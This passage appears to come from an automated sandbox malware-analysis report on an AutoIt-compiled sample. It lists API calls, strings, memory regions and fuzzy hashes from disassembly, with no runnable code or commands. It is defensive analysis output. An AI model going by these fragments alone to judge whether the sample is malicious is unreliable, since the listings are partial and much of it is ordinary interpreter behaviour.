                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirst
                                        • String ID:
                                        • API String ID: 48322524-0
                                        • Opcode ID: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                                        • Instruction ID: 14dec30f42ce9f6a9c476b8eae8c88fb7d0a1632de6d485b388d318187d8370a
                                        • Opcode Fuzzy Hash: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                                        • Instruction Fuzzy Hash: 35E020714104095BC220B738EC4D8EA775CEE06335F100715F935D14E0E7B06D5495D5
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90BBB
                                        • timeGetTime.WINMM ref: 00E90E76
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90FB3
                                        • TranslateMessage.USER32(?), ref: 00E90FC7
                                        • DispatchMessageW.USER32(?), ref: 00E90FD5
                                        • Sleep.KERNEL32(0000000A), ref: 00E90FDF
                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00E9105A
                                        • DestroyWindow.USER32 ref: 00E91066
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E91080
                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00EC52AD
                                        • TranslateMessage.USER32(?), ref: 00EC608A
                                        • DispatchMessageW.USER32(?), ref: 00EC6098
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EC60AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                        • API String ID: 4003667617-3242690629
                                        • Opcode ID: f6b06a90fbb23a9692d171b8f6b879053d1aa77bbe390ece15fa811518a6a00d
                                        • Instruction ID: a2a77bbe0a92ee2f69b50c664ac191c43710199179107478d33d7346d5e1d3da
                                        • Opcode Fuzzy Hash: f6b06a90fbb23a9692d171b8f6b879053d1aa77bbe390ece15fa811518a6a00d
                                        • Instruction Fuzzy Hash: 4FB2F471608741DFDB28DF24C984FAAB7E4FF84308F14591DE49AA72A1DB71E885CB42
                                        APIs
                                          • Part of subcall function 00EE91E9: __time64.LIBCMT ref: 00EE91F3
                                          • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                                        • __wsplitpath.LIBCMT ref: 00EE94BE
                                          • Part of subcall function 00EA432E: __wsplitpath_helper.LIBCMT ref: 00EA436E
                                        • _wcscpy.LIBCMT ref: 00EE94D1
                                        • _wcscat.LIBCMT ref: 00EE94E4
                                        • __wsplitpath.LIBCMT ref: 00EE9509
                                        • _wcscat.LIBCMT ref: 00EE951F
                                        • _wcscat.LIBCMT ref: 00EE9532
                                          • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9268
                                          • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9277
                                        • _wcscmp.LIBCMT ref: 00EE9479
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE96DC
                                        • _wcsncpy.LIBCMT ref: 00EE974F
                                        • DeleteFileW.KERNEL32(?,?), ref: 00EE9785
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EE979B
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97AC
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                        • String ID:
                                        • API String ID: 1500180987-0
                                        • Opcode ID: 2f354fd26af39d8e6632110fef49c51a42ee3d4ee6181d862f9c7c3d6112c9c2
                                        • Instruction ID: cc9e2c2aa72aafb2be144ae738e2ed6b79fbf5b1b936f633bf538dab8ebab570
                                        • Opcode Fuzzy Hash: 2f354fd26af39d8e6632110fef49c51a42ee3d4ee6181d862f9c7c3d6112c9c2
                                        • Instruction Fuzzy Hash: 0BC12CB1D0021DAADF21DF95CC85ADEB7FDAF49310F0050AAF609F6152EB709A848F65
                                        APIs
                                          • Part of subcall function 00E84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F462F8,?,00E837C0,?), ref: 00E84882
                                          • Part of subcall function 00EA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E872C5), ref: 00EA0771
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E87308
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EBECF1
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EBED32
                                        • RegCloseKey.ADVAPI32(?), ref: 00EBED70
                                        • _wcscat.LIBCMT ref: 00EBEDC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 2673923337-2727554177
                                        • Opcode ID: d0b534d1fc3bd556a690617b3270bad26c620e60bcf9fee1946b2694b0be4a99
                                        • Instruction ID: b5b10875f8817b1c7f1af7063a176181079f7dc386698c7d8d036140da1737ba
                                        • Opcode Fuzzy Hash: d0b534d1fc3bd556a690617b3270bad26c620e60bcf9fee1946b2694b0be4a99
                                        • Instruction Fuzzy Hash: ED716E755083059EC314FF65DC8189BBBE8FF59740B40542EF849A72A1DBB0DA48DF92
                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                                        • LoadIconW.USER32(00000063), ref: 00E83A88
                                        • LoadIconW.USER32(000000A4), ref: 00E83A9A
                                        • LoadIconW.USER32(000000A2), ref: 00E83AAC
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                                        • RegisterClassExW.USER32(?), ref: 00E83B28
                                          • Part of subcall function 00E83041: GetSysColorBrush.USER32(0000000F), ref: 00E83074
                                          • Part of subcall function 00E83041: RegisterClassExW.USER32(00000030), ref: 00E8309E
                                          • Part of subcall function 00E83041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                                          • Part of subcall function 00E83041: LoadIconW.USER32(000000A9), ref: 00E830F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 2880975755-4155596026
                                        • Opcode ID: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                                        • Instruction ID: 98c1ba6c66f1700368dc6a796a8ffafb5afbf95dce3753cce8cd283ae86c4781
                                        • Opcode Fuzzy Hash: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                                        • Instruction Fuzzy Hash: 7A211975900308BFEF10DFA4EC09B9D7BB4FB1A711F00412AE904E62A0D3BA5654AF96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                        • API String ID: 1825951767-3513169116
                                        • Opcode ID: 1ab8b38c072ba5ad877e43422404823ee9837726c7af47db3f966776feb9cc8b
                                        • Instruction ID: 9fae33047d6a8880c50b3e752a7083fcfa6f00a0870ee699927556b9be9b2d92
                                        • Opcode Fuzzy Hash: 1ab8b38c072ba5ad877e43422404823ee9837726c7af47db3f966776feb9cc8b
                                        • Instruction Fuzzy Hash: 00A16E7191021DAACF14FBA0CC95AEEB7B8BF15700F44142AF41EB7192EF749A09DB61
                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                                        • RegisterClassExW.USER32(00000030), ref: 00E8309E
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                                        • LoadIconW.USER32(000000A9), ref: 00E830F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                                        • Instruction ID: a3c0a0d6f3bd64b99f9d6f8dac0b017ad9c953b3277f0364fbc7b3aba1d9cb7a
                                        • Opcode Fuzzy Hash: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                                        • Instruction Fuzzy Hash: CF3116B5940309AFDB50DFA4E885ACDBBF0FB1A710F10452AE990E62A0D3B54549EF92
                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                                        • RegisterClassExW.USER32(00000030), ref: 00E8309E
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                                        • LoadIconW.USER32(000000A9), ref: 00E830F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                                        • Instruction ID: 6f803984642109e81c9de70ea4a5a52c6618708956bf988e9f8c78942f75ac8b
                                        • Opcode Fuzzy Hash: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                                        • Instruction Fuzzy Hash: 4021C3B591031CAFDB10DFA4EC89B9DBBF4FB1A700F00412AF911E62A0D7B54548AF92
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0119074D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction ID: 48ae1d654a78b241f60a6be0af99fb1758e559001e7b02fac2fe66a3d5801162
                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction Fuzzy Hash: 4551FA75A50208FBEF28DFA4CC49FDE7778AF4C700F108558F65AEA180DB749A448BA0
                                        APIs
                                        • _memset.LIBCMT ref: 00EBEE62
                                        • 7523D0D0.COMDLG32(?), ref: 00EBEEAC
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                          • Part of subcall function 00EA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: NamePath$7523FullLong_memset
                                        • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                        • API String ID: 3285060876-1954568251
                                        • Opcode ID: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                                        • Instruction ID: 29672edc0c7834bd7f610668b78c3bbb3de4cd2337f051c974feff96e6738159
                                        • Opcode Fuzzy Hash: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                                        • Instruction Fuzzy Hash: C721A470A042589BCB11EFA4C845BEE7BF89F49314F10405AE40CFB282DBF499499F91
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                                        • ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                                        • ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                                        • Instruction ID: ad4f76bd6e249affd0fd05ad889a1d138bd9529de57701fca4e8e94dcda0265b
                                        • Opcode Fuzzy Hash: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                                        • Instruction Fuzzy Hash: 54F03A746402987EEF3117276C08E273E7DE7D7F50B00002ABD00E21B0C2E50800FAB2
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EBD5EC
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • _memset.LIBCMT ref: 00E8418D
                                        • _wcscpy.LIBCMT ref: 00E841E1
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                        • String ID: Line:
                                        • API String ID: 3942752672-1585850449
                                        • Opcode ID: bee50828b3b146b87b2c277d9f398d18797f6363ff41f8bcbb6ca4d8f857b663
                                        • Instruction ID: 3748b49ee414bea48c698117d53bd8c19bf4450ed2b0565601f7c87d0666fa00
                                        • Opcode Fuzzy Hash: bee50828b3b146b87b2c277d9f398d18797f6363ff41f8bcbb6ca4d8f857b663
                                        • Instruction Fuzzy Hash: 2D31A171009309AAD721FB60DC45BDB77E8AF56304F10551EB58DB20E1EBB4A648D793
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                        • String ID:
                                        • API String ID: 1559183368-0
                                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                        • Instruction ID: 779e997d07ec942afde5a806c167ae08009a970c927b620c247d79b46f768b42
                                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                        • Instruction Fuzzy Hash: 8051CA32A00B05DFDB248F79C8806AE77A5AF4A324F64972AF835BE1D0D770BD508B40
                                        APIs
                                          • Part of subcall function 00E84F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                                        • _free.LIBCMT ref: 00EBE68C
                                        • _free.LIBCMT ref: 00EBE6D3
                                          • Part of subcall function 00E86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                        • API String ID: 2861923089-1757145024
                                        • Opcode ID: b2749d739f4be268c282df12c136f903b0f5f5ef0fecb180632be55638908045
                                        • Instruction ID: 2f3f3c4223d6ae68a80d64b0c74c0d91168b6eb73ceafdb19f8b9f7ef319051a
                                        • Opcode Fuzzy Hash: b2749d739f4be268c282df12c136f903b0f5f5ef0fecb180632be55638908045
                                        • Instruction Fuzzy Hash: 5A914E71910219AFCF14EFA4C8919EEB7F4FF19314F14546AF81ABB2A1EB30A905DB50
                                        APIs
                                          • Part of subcall function 01192098: Sleep.KERNELBASE(000001F4), ref: 011920A9
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011922EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: 7DK4Y9LWGJW4A5CH20QWZFQ9W4ZNHK
                                        • API String ID: 2694422964-8129067
                                        • Opcode ID: 8cf6f930d9b1b0ccf2c82e978e6faf96e62a1329bf7e978e87886e233e01b887
                                        • Instruction ID: 03ef2a9e1ec00edd6dec106fc3a5880244c4462dab2c694b832f0bcacaf240df
                                        • Opcode Fuzzy Hash: 8cf6f930d9b1b0ccf2c82e978e6faf96e62a1329bf7e978e87886e233e01b887
                                        • Instruction Fuzzy Hash: AE61A870D1828CEAEF15D7B4C858BDEBBB49F19304F044199E6587B2C1C7B90B49CB66
                                        APIs
